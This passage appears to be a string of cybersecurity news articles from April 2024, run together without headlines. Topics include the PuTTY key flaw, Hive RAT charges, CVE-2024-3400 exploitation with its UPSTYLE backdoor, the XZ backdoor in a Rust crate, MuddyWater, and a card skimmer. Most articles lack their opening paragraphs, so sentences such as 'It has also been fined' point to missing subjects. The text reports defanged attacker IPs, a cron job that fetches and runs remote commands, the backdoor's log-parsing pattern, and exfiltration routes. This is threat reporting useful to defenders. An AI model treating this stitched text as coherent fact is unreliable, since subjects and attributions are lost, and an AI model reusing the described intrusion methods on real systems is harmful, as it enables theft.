(man-in-the-middle attacks are not possible given that clients do not transmit
their signature in the clear) or from any other source, e.g. signed git commits
through forwarded agents."
Besides impacting PuTTY, it also affects other products that incorporate a
vulnerable version of the software -
FileZilla (3.24.1 - 3.66.5) WinSCP (5.9.5 - 6.3.2) TortoiseGit (2.4.0.2 -
2.15.0) TortoiseSVN (1.10.0 - 1.14.6) Following responsible disclosure,
the issue has been addressed in PuTTY 0.81, FileZilla 3.67.0, WinSCP 6.3.3, and
TortoiseGit 2.15.0.1. Users of TortoiseSVN are recommended to use Plink from the
latest PuTTY 0.81 release when accessing an SVN repository via SSH until a patch
becomes available.
Specifically, it has been resolved by switching to the RFC 6979 technique for
all DSA and ECDSA key types, abandoning its earlier method of deriving the nonce
using a deterministic approach that, while avoiding the need for a source of
high-quality randomness, was susceptible to biased nonces when using P-521.
On top of that, ECDSA NIST-P521 keys used with any of the vulnerable components
should be considered compromised and consequently revoked by removing them from
authorized_keys files files and their equivalents in other SSH servers.
The U.S. Justice Department (DoJ) said the malware "gave the malware purchasers
control over victim computers and enabled them to access victims' private
communications, their login credentials, and other personal information."
A 24-year-old individual named Edmond Chakhmakhchyan (aka "Corruption") from Van
Nuys in Los Angeles, California, was taken into custody after he was caught
selling a license of Hive RAT to an undercover employee of a law enforcement
agency.
He has been charged with one count of conspiracy and one count of advertising a
device as an interception device, each of which carries a penalty of five years
in prison. Chakhmakhchyan pleaded not guilty and was ordered to stand trial on
June 4, 2024.
Court documents allege a partnership between the malware's creator and the
defendant under which the latter would post advertisements for the malware on a
cybercrime forum called Hack Forums, accept cryptocurrency payments from
customers, and offer product support.
Hive RAT comes with capabilities to terminate programs, browse files, record
keystrokes, access incoming and outgoing communications, and steal victim
passwords and other credentials for bank accounts and cryptocurrency wallets
from victims' machines without their knowledge or consent.
"Chakhmakhchyan exchanged electronic messages with purchasers and explained to
one buyer that the malware 'allowed the Hive RAT user to access another person's
computer without that person knowing about the access,'" the DoJ said.
The Australian Federal Police (AFP), which announced charges of its own against
a citizen for their purported involvement in the creation and sale of Hive RAT,
said its investigation into the matter began in 2020.
The unnamed suspect faces 12 charges, including one count of producing data with
intent to commit a computer offense, one count of controlling data with intent
to commit a computer offense, and 10 counts of supplying data with intent to
commit a computer offense. The maximum penalty for each of these offenses is
three years imprisonment.
"Remote Access Trojans are one of the most harmful cyber threats in the online
environment – once installed onto a device, a RAT can provide criminals with
full access to, and control of the device," AFP Acting Commander Cybercrime Sue
Evans said.
"This could include anything from committing crimes anonymously, watching
victims through camera devices, wiping hard drives, or stealing banking
credentials and other sensitive information."
Nebraska Man Indicted in Cryptojacking Scheme# The development comes as
federal prosecutors in the U.S. indicted Charles O. Parks III (aka "CP3O"), 45,
for operating a massive illegal cryptojacking operation, defrauding "two
well-known providers of cloud computing services" out of more than $3.5 million
in computing resources to mine cryptocurrency worth nearly $1 million.
The indictment charges the Parks with wire fraud, money laundering, and engaging
in unlawful monetary transactions. He was arrested on April 13, 2024. The wire
fraud and money laundering charges carry a maximum sentence of 20 years'
imprisonment. He also faces a 10 years' imprisonment on the unlawful monetary
transactions charges.
While the DoJ does not explicitly state what cloud providers were targeted
in the fraudulent operation, it noted that the companies are based in the
Washington state cities of Seattle and Redmond – the corporate headquarters for
Amazon and Microsoft.
"From in or about January 2021 through August 2021, Parks created and used a
variety of names, corporate affiliations and email addresses, including emails
with domains from corporate entities he operated [...] to register numerous
accounts with the cloud providers and to gain access to massive amounts of
computing processing power and storage that he did not pay for," the DoJ said.
The illicitly obtained resources were then used to mine cryptocurrencies such as
Ether (ETH), Litecoin (LTC) and Monero (XMR), which were laundered through a
network of cryptocurrency exchanges, a non-fungible token (NFT) marketplace, an
online payment provider, and traditional bank accounts to conceal digital
transaction trail.
The ill-gotten proceeds, prosecutors said, were ultimately converted into
dollars, which Parks used to make various extravagant purchases that included a
Mercedes Benz luxury car, jewelry, and first-class hotel and travel expenses.
"Parks tricked the providers into approving heightened privileges and benefits,
including elevated levels of cloud computing services and deferred billing
accommodations, and deflected inquiries from the providers regarding
questionable data usage and mounting unpaid subscription balances," the DoJ
said.
It has also been fined more than $7 million over charges that it revealed users'
sensitive personal health information and other data to third parties for
advertising purposes and failed to honor its easy cancellation policies.
"Cerebral and its former CEO, Kyle Robertson, repeatedly broke their privacy
promises to consumers and misled them about the company's cancellation
policies," the FTC said in a press statement.
While claiming to offer "safe, secure, and discreet" services in order to get
consumers to sign up and provide their data, the company, FTC alleged, did not
clearly disclose that the information would be shared with third-parties for
advertising.
The agency also accused the company of burying its data sharing practices in
dense privacy policies, with the company engaging in deceptive practices by
claiming that it would not share users' data without their consent.
The company is said to have provided the sensitive information of nearly 3.2
million consumers to third parties such as LinkedIn, Snapchat, and TikTok by
integrating tracking tools within its websites and apps that are designed to
provide advertising and data analytics functions.
The information included names; medical and prescription histories; home and
email addresses; phone numbers; birthdates; demographic information; IP
addresses; pharmacy and health insurance information; and other health
information.
The FTC complaint further accused Cerebral of failing to enforce adequate
security guardrails by allowing former employees to access users' medical
records from May to December 2021, using insecure access methods that exposed
patient information, and not restricting access to consumer data to only those
employees who needed it.
"Cerebral sent out promotional postcards, which were not in envelopes, to over
6,000 patients that included their names and language that appeared to reveal
their diagnosis and treatment to anyone who saw the postcards," the FTC said.
Pursuant to the proposed order, which is pending approval from a federal court,
the company has been barred from using or disclosing consumers' personal and
health information to third-parties for marketing, and has been ordered to
implement a comprehensive privacy and data security program.
Cerebral has also been asked to post a notice on its website alerting users of
the FTC order, as well as adopt a data retention schedule and delete most
consumer data not used for treatment, payment, or health care operations unless
they have consented to it. It's also required to provide a mechanism for users
to get their data deleted.
The development comes days after alcohol addiction treatment firm Monument was
prohibited by the FTC from disclosing health information to third-party
platforms such as Google and Meta for advertising without users' permission
between 2020 and 2022 despite claiming such data would be "100% confidential."
The New York-based company has been ordered to notify users about the disclosure
of their health information to third parties and ensure that all the shared data
has been deleted.
"Monument failed to ensure it was complying with its promises and in fact
disclosed users' health information to third-party advertising platforms,
including highly sensitive data that revealed that its customers were receiving
help to recover from their addiction to alcohol," FTC said.
Over the past year, FTC has announced similar enforcement actions against
healthcare service providers like BetterHelp, GoodRx, and Premom for sharing
users' data with third-party analytics and social media firms without their
consent.
It also warned [PDF] Amazon against using patient data for marketing purposes
after it finalized a $3.9 billion acquisition of membership-based primary care
practice One Medical.
While the original shortcoming was discovered and patched by the Lighttpd
maintainers way back in August 2018 with version 1.4.51, the lack of a CVE
identifier or an advisory meant that it was overlooked by developers of AMI
MegaRAC BMC, ultimately ending up in products made by Intel and Lenovo.
Lighttpd (pronounced "Lighty") is an open-source high-performance web server
software designed for speed, security, and flexibility, while optimized for
high-performance environments without consuming a lot of system resources.
The silent fix for Lighttpd concerns an out-of-bounds read vulnerability that
could be exploited to exfiltrate sensitive data, such as process memory
addresses, thereby allowing threat actors to bypass crucial security mechanisms
like address space layout randomization (ASLR).
"The absence of prompt and important information about security fixes prevents
proper handling of these fixes down both the firmware and software supply
chains," the firmware security company said.
The flaws are described below -
Out-of-bounds read in Lighttpd 1.4.45 used in Intel M70KLP series firmware
Out-of-bounds read in Lighttpd 1.4.35 used in Lenovo BMC firmware
Out-of-bounds read in Lighttpd before 1.4.51 Intel and Lenovo have opted not
to address the issue as the products incorporating the susceptible version of
Lighttpd have hit end-of-life (EoL) status and are no longer eligible for
security updates, effectively turning it into a forever-day bug.
The disclosure highlights how the presence of outdated third-party components in
the latest version of firmware can traverse the supply chain and pose unintended
security risks for end users.
"This is yet another vulnerability that will remain unfixed forever in some
products and will present high-impact risk to the industry for a very long
time," Binarly added.
"Organizations often store a variety of data in SaaS applications and use
services from CSPs," Palo Alto Networks Unit 42 said in a report published last
week.
"The threat actors have begun attempting to leverage some of this data to assist
with their attack progression, and to use for extortion when trying to monetize
their work."
Muddled Libra, also called Starfraud, UNC3944, Scatter Swine, and Scattered
Spider, is a notorious cybercriminal group that has leveraged sophisticated
social engineering techniques to gain initial access to target networks.
"Scattered Spider threat actors have historically evaded detection on target
networks by using living off the land techniques and allowlisted applications to
navigate victim networks, as well as frequently modifying their TTPs," the U.S.
government said in an advisory late last year.
The attackers also have a history of monetizing access to victim networks in
numerous ways, including extortion enabled by ransomware and data theft.
Unit 42 previously told The Hacker News that the moniker "Muddled Libra" comes
from the "confusing muddled landscape" associated with the 0ktapus phishing kit,
which has been put to use by other threat actors to stage credential harvesting
attacks.
A key aspect of the threat actor's tactical evolution is the use of
reconnaissance techniques to identify administrative users to target when posing
as helpdesk staff using phone calls to obtain their passwords.
The recon phase also extends to Muddled Libra carrying out extensive research to
find information about the applications and the cloud service providers used by
the target organizations.
"The Okta cross-tenant impersonation attacks that occurred from late July to
early August 2023, where Muddled Libra bypassed IAM restrictions, display how
the group exploits Okta to access SaaS applications and an organization's
various CSP environments," security researcher Margaret Zimmermann explained.
The information obtained at this stage serves as a stepping stone for conducting
lateral movement, abusing the admin credentials to access single sign-on (SSO)
portals to gain quick access to SaaS applications and cloud infrastructure.
In the event SSO is not integrated into a target's CSP, Muddled Libra undertakes
broad discovery activities to uncover the CSP credentials, likely stored in
unsecured locations, to meet their objectives.
The data stored with SaaS applications are also used to glean specifics about
the infected environment, capturing as many credentials as possible to widen the
scope of the breach via privilege escalation and lateral movement.
"A large portion of Muddled Libra's campaigns involve gathering intelligence and
data," Zimmermann said.
"Attackers then use this to generate new vectors for lateral movement within an
environment. Organizations store a variety of data within their unique CSP
environments, thus making these centralized locations a prime target for Muddled
Libra."
The discovery actions specifically single out Amazon Web Services (AWS) and
Microsoft Azure, targeting services like AWS IAM, Amazon Simple Storage Service
(S3), AWS Secrets Manager, Azure storage account access keys, Azure Blob
Storage, and Azure Files to extract relevant data.
Data exfiltration is achieved by abusing legitimate CSP services and features.
This encompasses tools like AWS DataSync, AWS Transfer, and a technique called
snapshot, the latter of which makes it possible to move data out of an Azure
environment by staging the stolen data in a virtual machine.
Muddled Libra's tactical shift requires organizations to secure their identity
portals with robust secondary authentication protections like hardware tokens or
biometrics.
"By expanding their tactics to include SaaS applications and cloud environments,
the evolution of Muddled Libra's methodology shows the multidimensionality of
cyberattacks in the modern threat landscape," Zimmermann concluded. "The use of
cloud environments to gather large amounts of information and quickly exfiltrate
it poses new challenges to defenders."
"The latest iteration of LightSpy, dubbed 'F_Warehouse,' boasts a modular
framework with extensive spying features," the BlackBerry Threat Research and
Intelligence Team said in a report published last week.
There is evidence to suggest that the campaign may have targeted India based on
VirusTotal submissions from within its borders.
First documented in 2020 by Trend Micro and Kaspersky, LightSpy refers to an
advanced iOS backdoor that's distributed via watering hole attacks through
compromised news sites.
A subsequent analysis from ThreatFabric in October 2023 uncovered infrastructure
and functionality overlaps between the malware and an Android spyware known as
DragonEgg, which is attributed to the Chinese nation-state group APT41 (aka
Winnti).
The initial intrusion vector is presently not known, although it's suspected to
be via news websites that have been breached and are known to be visited by the
targets on a regular basis.
The starting point is a first-stage loader that acts as a launchpad for the core
LightSpy backdoor and its assorted plugins that are retrieved from a remote
server to pull off the data-gathering functions.
LightSpy is both fully-featured and modular, allowing threat actors to harvest
sensitive information, including contacts, SMS messages, precise location data
and sound recordings during VoIP calls.
The latest version discovered by the Canadian cybersecurity firm further expands
on its capabilities to steal files as well as data from popular apps like
Telegram, QQ, and WeChat, iCloud Keychain data, and web browser history from
Safari and Google Chrome.
The complex espionage framework also features capabilities to gather a list of
connected Wi-Fi networks, details about installed apps, take pictures using the
device's camera, record audio, and execute shell commands received from the
server, likely enabling it to hijack control of the infected devices.
"LightSpy employs certificate pinning to prevent detection and interception of
communication with its command-and-control (C2) server," Blackberry said. "Thus,
if the victim is on a network where traffic is being analyzed, no connection to
the C2 server will be established."
A further examination of the implant's source code suggests the involvement of
native Chinese speakers, raising the possibility of state-sponsored activity.
What's more, LightSpy communicates with a server located at 103.27[.]109[.]217,
which also hosts an administrator panel that displays an error message in
Chinese when entering incorrect login credentials.
The development comes as Apple said it sent out threat notifications to users in
92 countries, counting India, that they may have been targeted by mercenary
spyware attacks.
"The return of LightSpy, now equipped with the versatile 'F_Warehouse'
framework, signals an escalation in mobile espionage threats," BlackBerry said.
"The expanded capabilities of the malware, including extensive data
exfiltration, audio surveillance, and potential full device control, pose a
severe risk to targeted individuals and organizations in Southern Asia."
Tracked as CVE-2024-3400 (CVSS score: 10.0), the critical vulnerability is a
case of command injection in the GlobalProtect feature that an unauthenticated
attacker could weaponize to execute arbitrary code with root privileges on the
firewall.
Fixes for the shortcoming are available in the following versions -
PAN-OS 10.2.9-h1 PAN-OS 11.0.4-h1, and PAN-OS 11.1.2-h3 Patches for
other commonly deployed maintenance releases are expected to be released over
the next few days.
"This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1
firewalls configured with GlobalProtect gateway or GlobalProtect portal (or
both) and device telemetry enabled," the company clarified in its updated
advisory.
It also said that while Cloud NGFW firewalls are not impacted by CVE-2024-3400,
specific PAN-OS versions and distinct feature configurations of firewall VMs
deployed and managed by customers in the cloud are affected.
The exact origins of the threat actor exploiting the flaw are presently unknown
but Palo Alto Networks Unit 42 is tracking the malicious activity under the name
Operation MidnightEclipse.
Volexity, which attributed it to a cluster dubbed UTA0218, said CVE-2024-3400
has been leveraged since at least March 26, 2024, to deliver a Python-based
backdoor called UPSTYLE on the firewall that allows for the execution of
arbitrary commands via specially crafted requests.
It is unclear how widespread the exploitation has been, but the threat
intelligence firm said it has "evidence of potential reconnaissance activity
involving more widespread exploitation aimed at identifying vulnerable systems."
In attacks documented to date, UTA0218 has been observed deploying additional
payloads to launch reverse shells, exfiltrate PAN-OS configuration data, remove
log files, and deploy the Golang tunneling tool named GOST (GO Simple Tunnel).
No other follow-up malware or persistence methods are said to have been deployed
on victim networks, although it's unknown if it's by design or due to early
detection and response.
Shakeeb Ahmed, the defendant in question, pled guilty to one count of computer
fraud in December 2023 following his arrest in July.
"At the time of both attacks, Ahmed, a U.S. citizen, was a senior security
engineer for an international technology company whose resume reflected skills
in, among other things, reverse engineering smart contracts and blockchain
audits, which are some of the specialized skills Ahmed used to execute the
hacks," the U.S. Department of Justice (DoJ) noted at the time.
While the name of the company was not disclosed, he was residing in Manhattan,
New York, and working for Amazon before he was apprehended.
Court documents show that Ahmed exploited a security flaw in an unnamed
cryptocurrency exchange's smart contracts to insert "fake pricing data to
fraudulently generate millions of dollars' worth of inflated fees," which he was
able to withdraw.
Subsequently, he initiated contact with the company and agreed to return most of
the funds except for $1.5 million if the exchange agreed not to alert law
enforcement about the flash loan attack.
It's worth noting that CoinDesk reported in early July 2022 that an unknown
attacker returned more than $8 million worth of cryptocurrency to a Solana-based
crypto exchange called Crema Finance, while keeping $1.68 million as a "white
hat" bounty.
Ahmed has also been accused of carrying out an attack on a second decentralized
cryptocurrency exchange called Nirvana Finance, siphoning $3.6 million in the
process, ultimately leading to its shutdown.
"Ahmed used an exploit he discovered in Nirvana's smart contracts to allow him
to purchase cryptocurrency from Nirvana at a lower price than the contract was
designed to allow," the DoJ said.
"He then immediately resold that cryptocurrency to Nirvana at a higher price.
Nirvana offered Ahmed a 'bug bounty' of as much as $600,000 to return the stolen
funds, but Ahmed instead demanded $1.4 million, did not reach agreement with
Nirvana, and kept all the stolen funds."
The defendant then laundered the stolen funds to cover up the trail using
cross-chain bridges to move the illicit digital assets from Solana to Ethereum
and exchanging the proceeds into Monero using mixers like Samourai Whirlpool.
Besides the three-year jail term, Ahmed has been sentenced to three years of
supervised release and ordered to forfeit approximately $12.3 million and pay
restitution amounting more than $5 million to both the impacted crypto
exchanges.
The network security company's Unit 42 division is tracking the activity under
the name Operation MidnightEclipse, attributing it as the work of a single
threat actor of unknown provenance.
The security vulnerability, tracked as CVE-2024-3400 (CVSS score: 10.0), is a
command injection flaw that enables unauthenticated attackers to execute
arbitrary code with root privileges on the firewall.
It's worth noting that the issue is applicable only to PAN-OS 10.2, PAN-OS 11.0,
and PAN-OS 11.1 firewall configurations that have GlobalProtect gateway and
device telemetry enabled.
Operation MidnightEclipse entails the exploitation of the flaw to create a cron
job that runs every minute to fetch commands hosted on an external server
("172.233.228[.]93/policy" or "172.233.228[.]93/patch"), which are then executed
using the bash shell.
The attackers are said to have manually managed an access control list (ACL) for
the command-and-control (C2) server to ensure that it can only be accessed from
the device communicating with it.
While the exact nature of the command is unknown, it's suspected that the URL
serves as a delivery vehicle for a Python-based backdoor on the firewall that
Volexity – which discovered in-the-wild exploitation of CVE-2024-3400 on April
10, 2024 – is tracking as UPSTYLE and is hosted on a different server
("144.172.79[.]92" and "nhdata.s3-us-west-2.amazonaws[.]com").
The Python file is designed to write and launch another Python script
("system.pth"), which subsequently decodes and runs the embedded backdoor
component that's responsible for executing the threat actor's commands in a file
called "sslvpn_ngx_error.log." The results of the operation are written to a
separate file named "bootstrap.min.css."
The most interesting aspect of the attack chain is that both the files used to
extract the commands and write the results are legitimate files associated with
the firewall -
/var/log/pan/sslvpn_ngx_error.log
/var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css As for how
the commands are written to the web server error log, the threat actor forges
specially crafted network requests to a non-existent web page containing a
specific pattern. The backdoor then parses the log file and searches for the
line matching the same regular expression ("img\[([a-zA-Z0-9+/=]+)\]") to decode
and run the command within it.
"The script will then create another thread that runs a function called
restore," Unit 42 said. "The restore function takes the original content of the
bootstrap.min.css file, as well as the original access and modified times,
sleeps for 15 seconds and writes the original contents back to the file and sets
the access and modified times to their originals."
The main goal appears to be to avoid leaving traces of the command outputs,
necessitating that the results are exfiltrated within 15 seconds before the file
is overwritten.
Volexity, in its own analysis, said it observed the threat actor remotely
exploiting the firewall to create a reverse shell, download additional tooling,
pivot into internal networks, and ultimately exfiltrate data. The exact scale of
the campaign is presently unclear. The adversary has been assigned the moniker
UTA0218 by the company.
"The tradecraft and speed employed by the attacker suggests a highly capable
threat actor with a clear playbook of what to access to further their
objectives," the American cybersecurity firm said.
"UTA0218's initial objectives were aimed at grabbing the domain backup DPAPI
keys and targeting active directory credentials by obtaining the NTDS.DIT file.
They further targeted user workstations to steal saved cookies and login data,
along with the users' DPAPI keys."
Organizations are recommended to look for signs of lateral movement internally
from their Palo Alto Networks GlobalProtect firewall device.
The development has also prompted the U.S. Cybersecurity and Infrastructure
Security Agency (CISA) to add the flaw to its Known Exploited Vulnerabilities
(KEV) catalog, requiring federal agencies to apply the patches by April 19 to
mitigate potential threats. Palo Alto Networks is expected to release fixes for
the flaw no later than April 14.
"Targeting edge devices remains a popular vector of attack for capable threat
actors who have the time and resources to invest into researching new
vulnerabilities," Volexity said.
"It is highly likely UTA0218 is a state-backed threat actor based on the
resources required to develop and exploit a vulnerability of this nature, the
type of victims targeted by this actor, and the capabilities displayed to
install the Python backdoor and further access victim networks."
Hudhayfa Samir 'Abdallah al-Kahlut, 39, also known as Abu Ubaida, has served as
the public spokesperson of Izz al-Din al-Qassam Brigades, the military wing of
Hamas, since at least 2007.
"He publicly threatened to execute civilian hostages held by Hamas following the
terrorist group's October 7, 2023, attacks on Israel," the Treasury Department
said.
"Al-Kahlut leads the cyber influence department of al-Qassam Brigades. He was
involved in procuring servers and domains in Iran to host the official al-Qassam
Brigades website in cooperation with Iranian institutions."
Alongside Al-Kahlut, two other individuals named William Abu Shanab, 56, and
Bara'a Hasan Farhat, 35, for their role in the manufacturing of unmanned aerial
vehicles (UAVs) used by Hamas to conduct terrorist operations, including urban
warfare and intelligence gathering.
Both Abu Shanab and his assistant Farhat are said to be part of the
Lebanon-based al-Shimali unit, where the former is a commander.
Coinciding with the actions taken by the U.S., the European Union imposed
sanctions of its own against Al-Qassam Brigades, Al-Quds Brigades, and Nukhba
Force for their "brutal and indiscriminate terrorist attacks" targeting Israel
last year.
While Al-Quds Brigades is the armed wing of Palestinian Islamic Jihad, Nukhba
Force is a special forces unit of Hamas.
The joint action, said Under Secretary of the Treasury for Terrorism and
Financial Intelligence Brian E. Nelson, is aimed at "disrupting Hamas's ability
to conduct further attacks, including through cyber warfare and the production
of UAVs."
The development arrived a little over two months after the U.S. government
sanctioned six Iranian officials associated with the Iranian intelligence agency
for attacking critical infrastructure entities in the U.S. and other countries.
liblzma-sys, which has been downloaded over 21,000 times to date, provides Rust
developers with bindings to the liblzma implementation, an underlying library
that is part of the XZ Utils data compression software. The impacted version in
question is 0.3.2.
"The current distribution (v0.3.2) on Crates.io contains the test files for XZ
that contain the backdoor," Phylum noted in a GitHub issue raised on April 9,
2024.
"The test files themselves are not included in either the .tar.gz nor the .zip
tags here on GitHub and are only present in liblzma-sys_0.3.2.crate that is
installed from Crates.io."
Following responsible disclosure, the files in question
("tests/files/bad-3-corrupt_lzma2.xz" and
"tests/files/good-large_compressed.lzma") have since been removed from
liblzma-sys version 0.3.3 released on April 10. The previous version of the
crate has been pulled from the registry.
"The malicious tests files were committed upstream, but due to the malicious
build instructions not being present in the upstream repository, they were never
called or executed," Snyk said in an advisory of its own.
The backdoor in XZ Utils was discovered in late March when Microsoft engineer
Andres Freund identified malicious commits to the command-line utility impacting
versions 5.6.0 and 5.6.1 released in February and March 2024, respectively. The
popular package is integrated into many Linux distributions.
The code commits, made by a now-suspended GitHub user named JiaT75 (aka Jia
Tan), essentially made it possible to circumvent authentication controls within
SSH to execute code remotely, potentially allowing the operators to take over
the system.
"The overall compromise spanned over two years," SentinelOne researchers Sarthak
Misraa and Antonio Pirozzi said in an analysis published this week. "Under the
alias Jia Tan, the actor began contributing to the xz project on October 29,
2021."
"Initially, the commits were innocuous and minor. However, the actor gradually
became a more active contributor to the project, steadily gaining reputation and
trust within the community."
According to Russian cybersecurity company Kaspersky, the trojanized changes
take the form of a multi-stage operation.
"The source code of the build infrastructure that generated the final packages
was slightly modified (by introducing an additional file build-to-host.m4) to
extract the next stage script that was hidden in a test case file
(bad-3-corrupt_lzma2.xz)," it said.
"These scripts in turn extracted a malicious binary component from another test
case file (good-large_compressed.lzma) that was linked with the legitimate
library during the compilation process to be shipped to Linux repositories."
The payload, a shell script, is responsible for the extraction and the execution
of the backdoor, which, in turn, hooks into specific functions –
RSA_public_decrypt, EVP_PKEY_set1_RSA, and RSA_get0_key – that will allow it to
monitor every SSH connection to the infected machine.
The primary goal of the backdoor slipped into liblzma is to manipulate Secure
Shell Daemon (sshd) and monitor for commands sent by an attacker at the start of
an SSH session, effectively introducing a way to achieve remote code execution.
While the early discovery of the backdoor averted what could have been a
widespread compromise of the Linux ecosystem, the development is once again a
sign that open-source package maintainers are being targeted by social
engineering campaigns with the goal of staging software supply chain attacks.
In this case, it materialized in the form of a coordinated activity that
presumably featured several sockpuppet accounts that orchestrated a pressure
campaign aimed at forcing the project's longtime maintainer to bring on board a
co-maintainer to add more features and address issues.
"The flurry of open source code contributions and related pressure campaigns
from previously unknown developer accounts suggests that a coordinated social
engineering campaign using phony developer accounts was used to sneak malicious
code into a widely used open-source project," ReversingLabs said.
SentinelOne researchers revealed that the subtle code changes made by JiaT75
between versions 5.6.0 and 5.6.1 suggest that the modifications were engineered
to enhance the backdoor's modularity and plant more malware.
As of April 9, 2024, the source code repository associated with XZ Utils has
been restored on GitHub, nearly two weeks after it was disabled for a violation
of the company's terms of service.
The attribution of the operation and the intended targets are currently unknown,
although in light of the planning and sophistication behind it, the threat actor
is suspected to be a state-sponsored entity.
"It's evident that this backdoor is highly complex and employs sophisticated
methods to evade detection," Kaspersky said.
"While occasionally switching to a new remote administration tool or changing
their C2 framework, MuddyWater's methods remain constant," Deep Instinct
security researcher Simon Kenin said in a technical report published last week.
MuddyWater, also called Boggy Serpens, Mango Sandstorm, and TA450, is assessed
to be affiliated with Iran's Ministry of Intelligence and Security (MOIS). It's
known to be active since at least 2017, orchestrating spear-phishing attacks
that lead to the deployment of various legitimate Remote Monitoring and
Management (RMM) solutions on compromised systems.
Prior findings from Microsoft show that the group has ties with another Iranian
threat activity cluster tracked as Storm-1084 (aka DarkBit), with the latter
leveraging the access to orchestrate destructive wiper attacks against Israeli
entities.
The latest attack campaign, details of which were also previously revealed by
Proofpoint last month, commences with spear-phishing emails sent from
compromised accounts that contain links or attachments hosted on services like
Egnyte to deliver the Atera Agent software.
One of the URLs in question is "kinneretacil.egnyte[.]com," where the subdomain
"kinneretacil" refers to "kinneret.ac.il," an educational institution in Israel
and a customer of Rashim, which, in turn, was breached by Lord Nemesis (aka
Nemesis Kitten or TunnelVision) as part of a supply chain attack targeting the
academic sector in the country.
Lord Nemesis is suspected of being a "faketivist" operation directed against
Israel. It's also worth noting that Nemesis Kitten is a private contracting
company called Najee Technology, a subgroup within Mint Sandstorm that's backed
by Iran's Islamic Revolutionary Guard Corps (IRGC). The company was sanctioned
by the U.S. Treasury in September 2022.
"This is important because if 'Lord Nemesis' were able to breach Rashim's email
system, they might have breached the email systems of Rashim's customers using
the admin accounts that now we know they obtained from 'Rashim,'" Kenin
explained.
The web of connections has raised the possibility that MuddyWater may have used
the email account associated with Kinneret to distribute the links, thereby
giving the messages an illusion of trust and tricking the recipients into
clicking them.
"While not conclusive, the timeframe and context of the events indicate a
potential hand-off or collaboration between IRGC and MOIS to inflict as much
harm as possible on Israeli organizations and individuals," Kenin further added.
The attacks are also notable for relying on a set of domains and IP addresses
collectively dubbed DarkBeatC2 that are responsible for managing the infected
endpoints. This is accomplished by means of PowerShell code designed to
establish contact with the C2 server upon gaining initial access through other
means.
According to independent findings from Palo Alto Networks Unit 42, the threat
actor has been observed abusing the Windows Registry's AutodialDLL function to
side-load a malicious DLL and ultimately set up connections with a DarkBeatC2
domain.
The mechanism, in particular, involves establishing persistence through a
scheduled task that runs PowerShell to leverage the AutodialDLL registry key and
load the DLL for C2 framework. The cybersecurity firm said the technique was put
to use in a cyber attack aimed at an unnamed Middle East target.
Other methods adopted by MuddyWater to establish a C2 connection include the use
of a first-stage payload delivered via the spear-phishing email and leveraging
DLL side-loading to execute a malicious library.
A successful contact allows the infected host to receive PowerShell responses
that, for its part, fetches two more PowerShell scripts from the same server.
While one of the scripts is designed to read the contents of a file named
"C:\ProgramData\SysInt.log" and transmit them to the C2 server via an HTTP POST
request, the second script periodically polls the server to obtain additional
payloads and writes the results of the execution to "SysInt.log." The exact
nature of the next-stage payload is currently unknown.
"This framework is similar to the previous C2 frameworks used by MuddyWater,"
Kenin said. "PowerShell remains their 'bread and butter.'"
Curious Serpens Targets Defense Sector with FalseFont Backdoor# The
disclosure comes as Unit 42 unpacked the inner workings of a backdoor called
FalseFont that's used by an Iranian threat actor known as Peach Sandstorm (aka
APT33, Curious Serpens, Elfin, and Refined Kitten) in attacks targeting the
aerospace and defense sectors.
"The threat actors mimic legitimate human resources software, using a fake job
recruitment process to trick victims into installing the backdoor," security
researchers Tom Fakterman, Daniel Frank, and Jerome Tujague said, describing
FalseFont as "highly targeted."
Once installed, it presents a login interface impersonating an aerospace company
and captures the credentials as well as the educational and employment history
entered by the victim to a threat-actor controlled C2 server in JSON format.
The implant, besides its graphical user interface (GUI) component for user
inputs, also stealthily activates a second component in the background that
establishes persistence on the system, gathers system metadata, and executes
commands and processes sent from the C2 server.
Other features of FalseFont include the ability to download and upload files,
steal credentials, capture screenshots, terminate specific processes, run
PowerShell commands, and self-update the malware.
Tracked as CVE-2024-3400, the issue has a CVSS score of 10.0, indicating maximum
severity.
"A command injection vulnerability in the GlobalProtect feature of Palo Alto
Networks PAN-OS software for specific PAN-OS versions and distinct feature
configurations may enable an unauthenticated attacker to execute arbitrary code
with root privileges on the firewall," the company said in an advisory published
today.
The flaw impacts the following versions of PAN-OS, with fixes expected to be
released on April 14, 2024 -
PAN-OS < 11.1.2-h3 PAN-OS < 11.0.4-h1 PAN-OS < 10.2.9-h1 The company
also said that the issue is applicable only to firewalls that have the
configurations for both GlobalProtect gateway (Network > GlobalProtect >
Gateways) and device telemetry (Device > Setup > Telemetry) enabled.
Cybersecurity firm Volexity has been credited with discovering and reporting the
bug.
While there are no other technical details about the nature of the attacks, Palo
Alto Networks acknowledged that it's "aware of a limited number of attacks that
leverage the exploitation of this vulnerability."
In the interim, it's recommending customers with a Threat Prevention
subscription to enable Threat ID 95187 to secure against the threat.
The development comes as Chinese threat actors have increasingly relied on
zero-day flaws impacting Barracuda Networks, Fortinet, Ivanti, and VMware to
breach targets of interest and deploy covert backdoors for persistent access.
Sucuri said that the malware is injected into websites through tools that allow
for custom code, such as WordPress plugins like Simple Custom CSS and JS or the
"Miscellaneous Scripts" section of the Magento admin panel.
"Custom script editors are popular with bad actors because they allow for
external third party (and malicious) JavaScript and can easily pretend to be
benign by leveraging naming conventions that match popular scripts like Google
Analytics or libraries like JQuery," security researcher Matt Morrow said.
The bogus Meta Pixel tracker script identified by the web security company
contains similar elements as its legitimate counterpart, but a closer
examination reveals the addition of JavaScript code that substitutes references
to the domain "connect.facebook[.]net" with "b-connected[.]com."
While the former is a genuine domain linked to the Pixel tracking functionality,
the replacement domain is used to load an additional malicious script
("fbevents.js") that monitors if a victim is on a checkout page, and if so,
serves a fraudulent overlay to grab their credit card details.
It's worth noting that "b-connected[.]com" is a legitimate e-commerce website
that has been compromised at some point to host the skimmer code. What's more,
the information entered into the fake form is exfiltrated to another compromised
site ("www.donjuguetes[.]es").
To mitigate such risks, it's recommended to keep the sites up-to-date,
periodically review admin accounts to determine if all of them are valid, and
update passwords on a frequent basis.
This is particularly important as threat actors are known to leverage weak
passwords and flaws in WordPress plugins to gain elevated access to a target
site and add rogue admin users, which are then used to perform various other
activities, including adding additional plugins and backdoors.
"Because credit card stealers often wait for keywords such as 'checkout' or
'onepage,' they may not become visible until the checkout page has loaded,"
Morrow said.
"Since most checkout pages are dynamically generated based on cookie data and
other variables passed to the page, these scripts evade public scanners and the
only way to identify the malware is to check the page source or watch network
traffic. These scripts run silently in the background."
The development comes as Sucuri also revealed that sites built with WordPress
